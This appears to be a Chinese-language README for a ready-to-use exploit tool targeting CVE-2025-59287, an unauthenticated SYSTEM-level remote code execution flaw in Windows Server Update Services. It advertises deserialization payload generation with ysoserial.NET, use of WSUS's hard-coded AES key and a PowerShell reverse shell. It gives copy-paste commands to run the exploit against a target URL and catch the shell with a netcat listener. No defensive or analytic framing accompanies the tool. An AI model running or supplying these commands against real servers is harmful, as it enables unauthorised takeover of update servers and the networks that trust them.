CVE-2025-59287 WSUS RCE漏洞利用
针对Windows Server Update Services (WSUS) 未授权远程代码执行漏洞的自动化利用工具。
漏洞详情
- CVE ID: CVE-2025-59287
- CVSS 评分: 9.8 (严重)
- 攻击向量: 网络
- 认证: 无需认证
- 影响: 以SYSTEM权限执行远程代码
功能特性
✅ 完全自动化负载生成
✅ 自动下载ysoserial.NET依赖
✅ 内置反向shell监听器
✅ 跨平台支持 (Windows/Linux/Mac)
✅ 使用WSUS硬编码密钥的AES加密
✅ PowerShell反向shell负载
环境要求
pip install -r requirements.txt
Python依赖
.NET运行时 (自动检测)
- Windows: .NET Framework (内置)
- Linux/Mac: Wine 或 Mono
Ubuntu/Debian
sudo apt install wine-stable
sudo apt install mono-complete
安装步骤
克隆或下载漏洞利用文件 cd CVE-2025-59287-exploit
安装Python依赖 pip3 install -r requirements.txt
运行漏洞利用 (自动下载ysoserial.NET) python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444
使用方法
基本利用
python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444
如需在其他监听器上获取会话
终端1: 启动netcat监听器 nc -lvnp 4444
终端2: 运行无内置监听器的漏洞利用
python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 –no-listener